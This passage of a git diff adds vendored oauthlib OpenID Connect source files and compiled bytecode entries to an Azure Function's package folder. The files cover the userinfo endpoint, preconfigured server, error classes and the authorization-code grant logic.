_`Section 3.4`: https://datatracker.ietf.org/doc/html/rfc8628#section-3.4 + """ + + kwargs['client_id'] = self.client_id + kwargs['include_client_id'] = include_client_id + scope = self.scope if scope is None else scope + return prepare_token_request(self.grant_type, body=body, device_code=device_code, + scope=scope, **kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__init__.py new file mode 100644 index 0000000..7078d1f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__init__.py @@ -0,0 +1,7 @@ +""" +oauthlib.openid +~~~~~~~~~~~~~~ + +""" +from .connect.core.endpoints import Server, UserInfoEndpoint +from .connect.core.request_validator import RequestValidator diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..07871a4 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..6488aa9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__init__.py new file mode 100644 index 0000000..e69de29 diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..5cef064 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/exceptions.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/exceptions.cpython-39.pyc new file mode 100644 index 0000000..183ca4c Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/exceptions.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/request_validator.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/request_validator.cpython-39.pyc
new file mode 100644
index 0000000..284147e
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/request_validator.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/tokens.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/tokens.cpython-39.pyc
new file mode 100644
index 0000000..997a156
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/__pycache__/tokens.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__init__.py
new file mode 100644
index 0000000..8fd8a0b
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__init__.py
@@ -0,0 +1,9 @@
+"""
+oauthlib.openid.connect.core.endpoints
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This module is an implementation of various logic needed
+for consuming and providing OpenID Connect.
+"""
+from .pre_configured import Server
+from .userinfo import UserInfoEndpoint
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/__init__.cpython-39.pyc
new file mode 100644
index 0000000..d2d84fd
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/__init__.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/pre_configured.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/pre_configured.cpython-39.pyc
new file mode 100644
index 0000000..99981f2
Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/pre_configured.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/userinfo.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/userinfo.cpython-39.pyc
new file mode 100644
index 0000000..4fc12af
Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/__pycache__/userinfo.cpython-39.pyc differ
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/pre_configured.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/pre_configured.py
new file mode 100644
index 0000000..e95c56e
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/pre_configured.py
@@ -0,0 +1,97 @@
+"""
+oauthlib.openid.connect.core.endpoints.pre_configured
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+This module is an implementation of various endpoints needed
+for providing OpenID Connect servers.
+"""
+from oauthlib.oauth2.rfc6749.endpoints import (
+    AuthorizationEndpoint, IntrospectEndpoint, ResourceEndpoint,
+    RevocationEndpoint, TokenEndpoint,
+)
+from oauthlib.oauth2.rfc6749.grant_types import (
+    AuthorizationCodeGrant as OAuth2AuthorizationCodeGrant,
+    ClientCredentialsGrant, ImplicitGrant as OAuth2ImplicitGrant,
+    RefreshTokenGrant, ResourceOwnerPasswordCredentialsGrant,
+)
+from oauthlib.oauth2.rfc6749.tokens import BearerToken
+
+from ..grant_types import AuthorizationCodeGrant, HybridGrant, ImplicitGrant
+from ..grant_types.dispatchers import (
+    AuthorizationCodeGrantDispatcher, AuthorizationTokenGrantDispatcher,
+    ImplicitTokenGrantDispatcher,
+)
+from ..tokens import JWTToken
+from .userinfo import UserInfoEndpoint
+
+
+class Server(AuthorizationEndpoint, IntrospectEndpoint, TokenEndpoint,
+             ResourceEndpoint, RevocationEndpoint, UserInfoEndpoint):
+
+    """An all-in-one endpoint featuring all four major grant types
+    plus the OpenID Connect flows."""
+
+    def __init__(self, request_validator, token_expires_in=None,
+                 token_generator=None, refresh_token_generator=None,
+                 *args, **kwargs):
+        """Construct a new all-grants-in-one server.
+
+        :param request_validator: An implementation of
+                                  oauthlib.oauth2.RequestValidator.
+        :param token_expires_in: An int or a function to generate a token
+                                 expiration offset (in seconds) given an
+                                 oauthlib.common.Request object.
+        :param token_generator: A function to generate a token from a request.
+        :param refresh_token_generator: A function to generate a token from a
+                                        request for the refresh token.
+        :param kwargs: Extra parameters to pass to authorization-,
+                       token-, resource-, and revocation-endpoint constructors.
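+
+        A usage sketch; ``MyValidator`` stands in for your own subclass of
+        ``oauthlib.openid.RequestValidator`` (hypothetical name), and the
+        uri/body/headers values are assumed to come from your web framework::
+
+            from oauthlib.openid import Server
+
+            server = Server(MyValidator(), token_expires_in=3600)
+            headers, body, status = server.create_token_response(
+                uri, http_method='POST', body=raw_body, headers=raw_headers)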
+ """ + self.auth_grant = OAuth2AuthorizationCodeGrant(request_validator) + self.implicit_grant = OAuth2ImplicitGrant(request_validator) + self.password_grant = ResourceOwnerPasswordCredentialsGrant( + request_validator) + self.credentials_grant = ClientCredentialsGrant(request_validator) + self.refresh_grant = RefreshTokenGrant(request_validator) + self.openid_connect_auth = AuthorizationCodeGrant(request_validator) + self.openid_connect_implicit = ImplicitGrant(request_validator) + self.openid_connect_hybrid = HybridGrant(request_validator) + + self.bearer = BearerToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + + self.jwt = JWTToken(request_validator, token_generator, + token_expires_in, refresh_token_generator) + + self.auth_grant_choice = AuthorizationCodeGrantDispatcher(default_grant=self.auth_grant, oidc_grant=self.openid_connect_auth) + self.implicit_grant_choice = ImplicitTokenGrantDispatcher(default_grant=self.implicit_grant, oidc_grant=self.openid_connect_implicit) + + # See http://openid.net/specs/oauth-v2-multiple-response-types-1_0.html#Combinations for valid combinations + # internally our AuthorizationEndpoint will ensure they can appear in any order for any valid combination + AuthorizationEndpoint.__init__(self, default_response_type='code', + response_types={ + 'code': self.auth_grant_choice, + 'token': self.implicit_grant_choice, + 'id_token': self.openid_connect_implicit, + 'id_token token': self.openid_connect_implicit, + 'code token': self.openid_connect_hybrid, + 'code id_token': self.openid_connect_hybrid, + 'code id_token token': self.openid_connect_hybrid, + 'none': self.auth_grant + }, + default_token_type=self.bearer) + + self.token_grant_choice = AuthorizationTokenGrantDispatcher(request_validator, default_grant=self.auth_grant, oidc_grant=self.openid_connect_auth) + + TokenEndpoint.__init__(self, default_grant_type='authorization_code', + grant_types={ + 'authorization_code': self.token_grant_choice, + 'password': self.password_grant, + 'client_credentials': self.credentials_grant, + 'refresh_token': self.refresh_grant, + }, + default_token_type=self.bearer) + ResourceEndpoint.__init__(self, default_token='Bearer', + token_types={'Bearer': self.bearer, 'JWT': self.jwt}) + RevocationEndpoint.__init__(self, request_validator) + IntrospectEndpoint.__init__(self, request_validator) + UserInfoEndpoint.__init__(self, request_validator) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/userinfo.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/userinfo.py new file mode 100644 index 0000000..34568d5 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/endpoints/userinfo.py @@ -0,0 +1,99 @@ +""" +oauthlib.openid.connect.core.endpoints.userinfo +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +This module is an implementation of userinfo endpoint. +""" +import json +import logging + +from oauthlib.common import Request +from oauthlib.oauth2.rfc6749 import errors +from oauthlib.oauth2.rfc6749.endpoints.base import ( + BaseEndpoint, catch_errors_and_unavailability, +) +from oauthlib.oauth2.rfc6749.tokens import BearerToken + +log = logging.getLogger(__name__) + + +class UserInfoEndpoint(BaseEndpoint): + """Authorizes access to userinfo resource. 
+ """ + def __init__(self, request_validator): + self.bearer = BearerToken(request_validator, None, None, None) + self.request_validator = request_validator + BaseEndpoint.__init__(self) + + @catch_errors_and_unavailability + def create_userinfo_response(self, uri, http_method='GET', body=None, headers=None): + """Validate BearerToken and return userinfo from RequestValidator + + The UserInfo Endpoint MUST return a + content-type header to indicate which format is being returned. The + content-type of the HTTP response MUST be application/json if the + response body is a text JSON object; the response body SHOULD be encoded + using UTF-8. + """ + request = Request(uri, http_method, body, headers) + request.scopes = ["openid"] + self.validate_userinfo_request(request) + + claims = self.request_validator.get_userinfo_claims(request) + if claims is None: + log.error('Userinfo MUST have claims for %r.', request) + raise errors.ServerError(status_code=500) + + if isinstance(claims, dict): + resp_headers = { + 'Content-Type': 'application/json' + } + if "sub" not in claims: + log.error('Userinfo MUST have "sub" for %r.', request) + raise errors.ServerError(status_code=500) + body = json.dumps(claims) + elif isinstance(claims, str): + resp_headers = { + 'Content-Type': 'application/jwt' + } + body = claims + else: + log.error('Userinfo return unknown response for %r.', request) + raise errors.ServerError(status_code=500) + log.debug('Userinfo access valid for %r.', request) + return resp_headers, body, 200 + + def validate_userinfo_request(self, request): + """Ensure the request is valid. + + 5.3.1. UserInfo Request + The Client sends the UserInfo Request using either HTTP GET or HTTP + POST. The Access Token obtained from an OpenID Connect Authentication + Request MUST be sent as a Bearer Token, per Section 2 of OAuth 2.0 + Bearer Token Usage [RFC6750]. + + It is RECOMMENDED that the request use the HTTP GET method and the + Access Token be sent using the Authorization header field. + + The following is a non-normative example of a UserInfo Request: + + GET /userinfo HTTP/1.1 + Host: server.example.com + Authorization: Bearer SlAV32hkKG + + 5.3.3. UserInfo Error Response + When an error condition occurs, the UserInfo Endpoint returns an Error + Response as defined in Section 3 of OAuth 2.0 Bearer Token Usage + [RFC6750]. (HTTP errors unrelated to RFC 6750 are returned to the User + Agent using the appropriate HTTP status code.) + + The following is a non-normative example of a UserInfo Error Response: + + HTTP/1.1 401 Unauthorized + WWW-Authenticate: Bearer error="invalid_token", + error_description="The Access Token expired" + """ + if not self.bearer.validate_request(request): + raise errors.InvalidTokenError() + if "openid" not in request.scopes: + raise errors.InsufficientScopeError() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/exceptions.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/exceptions.py new file mode 100644 index 0000000..eb3839d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/exceptions.py @@ -0,0 +1,149 @@ +""" +oauthlib.oauth2.rfc6749.errors +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +Error used both by OAuth 2 clients and providers to represent the spec +defined error responses for all four core grant types. 
+""" +from oauthlib.oauth2.rfc6749.errors import FatalClientError, OAuth2Error + + +class FatalOpenIDClientError(FatalClientError): + pass + + +class OpenIDClientError(OAuth2Error): + pass + + +class InteractionRequired(OpenIDClientError): + """ + The Authorization Server requires End-User interaction to proceed. + + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface for End-User interaction. + """ + error = 'interaction_required' + status_code = 401 + + +class LoginRequired(OpenIDClientError): + """ + The Authorization Server requires End-User authentication. + + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface for End-User authentication. + """ + error = 'login_required' + status_code = 401 + + +class AccountSelectionRequired(OpenIDClientError): + """ + The End-User is REQUIRED to select a session at the Authorization Server. + + The End-User MAY be authenticated at the Authorization Server with + different associated accounts, but the End-User did not select a session. + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface to prompt for a session to + use. + """ + error = 'account_selection_required' + + +class ConsentRequired(OpenIDClientError): + """ + The Authorization Server requires End-User consent. + + This error MAY be returned when the prompt parameter value in the + Authentication Request is none, but the Authentication Request cannot be + completed without displaying a user interface for End-User consent. + """ + error = 'consent_required' + status_code = 401 + + +class InvalidRequestURI(OpenIDClientError): + """ + The request_uri in the Authorization Request returns an error or + contains invalid data. + """ + error = 'invalid_request_uri' + description = 'The request_uri in the Authorization Request returns an ' \ + 'error or contains invalid data.' + + +class InvalidRequestObject(OpenIDClientError): + """ + The request parameter contains an invalid Request Object. + """ + error = 'invalid_request_object' + description = 'The request parameter contains an invalid Request Object.' + + +class RequestNotSupported(OpenIDClientError): + """ + The OP does not support use of the request parameter. + """ + error = 'request_not_supported' + description = 'The request parameter is not supported.' + + +class RequestURINotSupported(OpenIDClientError): + """ + The OP does not support use of the request_uri parameter. + """ + error = 'request_uri_not_supported' + description = 'The request_uri parameter is not supported.' + + +class RegistrationNotSupported(OpenIDClientError): + """ + The OP does not support use of the registration parameter. + """ + error = 'registration_not_supported' + description = 'The registration parameter is not supported.' + + +class InvalidTokenError(OAuth2Error): + """ + The access token provided is expired, revoked, malformed, or + invalid for other reasons. The resource SHOULD respond with + the HTTP 401 (Unauthorized) status code. The client MAY + request a new access token and retry the protected resource + request. 
+ """ + error = 'invalid_token' + status_code = 401 + description = ("The access token provided is expired, revoked, malformed, " + "or invalid for other reasons.") + + +class InsufficientScopeError(OAuth2Error): + """ + The request requires higher privileges than provided by the + access token. The resource server SHOULD respond with the HTTP + 403 (Forbidden) status code and MAY include the "scope" + attribute with the scope necessary to access the protected + resource. + """ + error = 'insufficient_scope' + status_code = 403 + description = ("The request requires higher privileges than provided by " + "the access token.") + + +def raise_from_error(error, params=None): + import inspect + import sys + kwargs = { + 'description': params.get('error_description'), + 'uri': params.get('error_uri'), + 'state': params.get('state') + } + for _, cls in inspect.getmembers(sys.modules[__name__], inspect.isclass): + if cls.error == error: + raise cls(**kwargs) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__init__.py new file mode 100644 index 0000000..64dd51d --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__init__.py @@ -0,0 +1,13 @@ +""" +oauthlib.openid.connect.core.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +from .authorization_code import AuthorizationCodeGrant +from .base import GrantTypeBase +from .dispatchers import ( + AuthorizationCodeGrantDispatcher, AuthorizationTokenGrantDispatcher, + ImplicitTokenGrantDispatcher, +) +from .hybrid import HybridGrant +from .implicit import ImplicitGrant +from .refresh_token import RefreshTokenGrant diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..bea49bc Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/authorization_code.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/authorization_code.cpython-39.pyc new file mode 100644 index 0000000..3b5e096 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/authorization_code.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/base.cpython-39.pyc new file mode 100644 index 0000000..827f8da Binary files /dev/null and 
b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/dispatchers.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/dispatchers.cpython-39.pyc new file mode 100644 index 0000000..a432f37 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/dispatchers.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/hybrid.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/hybrid.cpython-39.pyc new file mode 100644 index 0000000..8f61249 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/hybrid.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/implicit.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/implicit.cpython-39.pyc new file mode 100644 index 0000000..e0055c1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/implicit.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/refresh_token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/refresh_token.cpython-39.pyc new file mode 100644 index 0000000..34ff8c9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/__pycache__/refresh_token.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/authorization_code.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/authorization_code.py new file mode 100644 index 0000000..8a50421 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/authorization_code.py @@ -0,0 +1,43 @@ +""" +oauthlib.openid.connect.core.grant_types +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ +""" +import logging + +from oauthlib.oauth2.rfc6749.grant_types.authorization_code import ( + AuthorizationCodeGrant as OAuth2AuthorizationCodeGrant, +) + +from .base import GrantTypeBase + +log = logging.getLogger(__name__) + + +class AuthorizationCodeGrant(GrantTypeBase): + + def __init__(self, request_validator=None, **kwargs): + self.proxy_target = OAuth2AuthorizationCodeGrant( + request_validator=request_validator, **kwargs) + 
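# Hook OpenID Connect onto the proxied plain OAuth2 grant: the
+        # post-auth validator below enforces the OIDC request rules and
+        # the token modifier attaches an id_token to issued tokens.
+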
self.custom_validators.post_auth.append(
+            self.openid_authorization_validator)
+        self.register_token_modifier(self.add_id_token)
+
+    def add_id_token(self, token, token_handler, request):
+        """
+        Construct an initial version of id_token, and let the
+        request_validator sign or encrypt it.
+
+        The authorization_code version of this method is used to
+        retrieve the nonce according to the code storage.
+        """
+        # Treat it as normal OAuth 2 auth code request if openid is not present
+        if not request.scopes or 'openid' not in request.scopes:
+            return token
+
+        nonce = self.request_validator.get_authorization_code_nonce(
+            request.client_id,
+            request.code,
+            request.redirect_uri,
+            request
+        )
+        return super().add_id_token(token, token_handler, request, nonce=nonce)
diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/base.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/base.py
new file mode 100644
index 0000000..c9df326
--- /dev/null
+++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/oauthlib/openid/connect/core/grant_types/base.py
@@ -0,0 +1,327 @@
+import base64
+import hashlib
+import logging
+import time
+from json import loads
+
+from oauthlib.oauth2.rfc6749.errors import (
+    ConsentRequired, InvalidRequestError, LoginRequired,
+)
+
+
+log = logging.getLogger(__name__)
+
+
+class GrantTypeBase:
+
+    # Just proxy the majority of method calls through to the
+    # proxy_target grant type handler, which will usually be either
+    # the standard OAuth2 AuthCode or Implicit grant types.
+    def __getattr__(self, attr):
+        return getattr(self.proxy_target, attr)
+
+    def __setattr__(self, attr, value):
+        proxied_attrs = {'refresh_token', 'response_types'}
+        if attr in proxied_attrs:
+            setattr(self.proxy_target, attr, value)
+        else:
+            super(OpenIDConnectBase, self).__setattr__(attr, value)
+
+    def validate_authorization_request(self, request):
+        """Validates the OpenID Connect authorization request parameters.
+
+        :returns: (list of scopes, dict of request info)
+        """
+        return self.proxy_target.validate_authorization_request(request)
+
+    def _inflate_claims(self, request):
+        # This may be called multiple times in a single request, so make
+        # sure we only de-serialize the claims once.
+        if request.claims and not isinstance(request.claims, dict):
+            # Specific claims are requested during the Authorization Request
+            # and may be requested for inclusion in either the id_token or the
+            # UserInfo endpoint response, see
+            # http://openid.net/specs/openid-connect-core-1_0.html#ClaimsParameter
+            try:
+                request.claims = loads(request.claims)
+            except Exception:
+                raise InvalidRequestError(description="Malformed claims parameter",
+                                          uri="http://openid.net/specs/openid-connect-core-1_0.html#ClaimsParameter")
+
+    def id_token_hash(self, value, hashfunc=hashlib.sha256):
+        """
+        Its value is the base64url encoding of the left-most half of the
+        hash of the octets of the ASCII representation of the access_token
+        value, where the hash algorithm used is the hash algorithm used in
+        the alg Header Parameter of the ID Token's JOSE Header.
+
+        For instance, if the alg is RS256, hash the access_token value
+        with SHA-256, then take the left-most 128 bits and
+        base64url-encode them.
+        For instance, if the alg is HS512, hash the code value with
+        SHA-512, then take the left-most 256 bits and base64url-encode
+        them.
The c_hash value is a case-sensitive string.
+
+        Example of hash from OIDC specification (bound to a JWS using RS256):
+
+        code:
+        Qcb0Orv1zh30vL1MPRsbm-diHiMwcLyZvn1arpZv-Jxf_11jnpEX3Tgfvk
+
+        c_hash:
+        LDktKdoQak3Pk0cnXxCltA
+        """
+        digest = hashfunc(value.encode()).digest()
+        left_most = len(digest) // 2
+        return base64.urlsafe_b64encode(digest[:left_most]).decode().rstrip("=")
+
+    def add_id_token(self, token, token_handler, request, nonce=None):
+        """
+        Construct an initial version of id_token, and let the
+        request_validator sign or encrypt it.
+
+        The initial version can contain the fields below, according
+        to the spec:
+        - aud
+        - iat
+        - nonce
+        - at_hash
+        - c_hash
+        """
+        # Treat it as normal OAuth 2 auth code request if openid is not present
+        if not request.scopes or 'openid' not in request.scopes:
+            return token
+
+        # Only add an id token on auth/token step if asked for.
+        if request.response_type and 'id_token' not in request.response_type:
+            return token
+
+        # The implementation may mint its own id_token without help.
+        id_token = self.request_validator.get_id_token(token, token_handler, request)
+        if id_token:
+            token['id_token'] = id_token
+            return token
+
+        # Otherwise, fall back on the oauthlib framework for help.
+        # Start with the technical fields bound to the specification.
+        id_token = {}
+        id_token['aud'] = request.client_id
+        id_token['iat'] = int(time.time())
+
+        # nonce is REQUIRED when response_type value is:
+        # - id_token token (Implicit)
+        # - id_token (Implicit)
+        # - code id_token (Hybrid)
+        # - code id_token token (Hybrid)
+        #
+        # nonce is OPTIONAL when response_type value is:
+        # - code (Authorization Code)
+        # - code token (Hybrid)
+        if nonce is not None:
+            id_token["nonce"] = nonce
+
+        # at_hash is REQUIRED when response_type value is:
+        # - id_token token (Implicit)
+        # - code id_token token (Hybrid)
+        #
+        # at_hash is OPTIONAL when:
+        # - code (Authorization code)
+        # - code id_token (Hybrid)
+        # - code token (Hybrid)
+        #
+        # at_hash MAY NOT be used when:
+        # - id_token (Implicit)
+        if "access_token" in token:
+            id_token["at_hash"] = self.id_token_hash(token["access_token"])
+
+        # c_hash is REQUIRED when response_type value is:
+        # - code id_token (Hybrid)
+        # - code id_token token (Hybrid)
+        #
+        # c_hash is OPTIONAL for others.
+        if "code" in token:
+            id_token["c_hash"] = self.id_token_hash(token["code"])
+
+        # Call request_validator to complete/sign/encrypt id_token
+        token['id_token'] = self.request_validator.finalize_id_token(id_token, token, token_handler, request)
+
+        return token
+
+    def openid_authorization_validator(self, request):
+        """Perform OpenID Connect specific authorization request validation.
+
+        nonce
+                OPTIONAL. String value used to associate a Client session with
+                an ID Token, and to mitigate replay attacks. The value is
+                passed through unmodified from the Authentication Request to
+                the ID Token. Sufficient entropy MUST be present in the nonce
+                values used to prevent attackers from guessing values.
+
+        display
+                OPTIONAL. ASCII string value that specifies how the
+                Authorization Server displays the authentication and consent
+                user interface pages to the End-User. The defined values are:
+
+                    page - The Authorization Server SHOULD display the
+                    authentication and consent UI consistent with a full User
+                    Agent page view. If the display parameter is not specified,
+                    this is the default display mode.
+
+                    popup - The Authorization Server SHOULD display the
+                    authentication and consent UI consistent with a popup User
+                    Agent window.
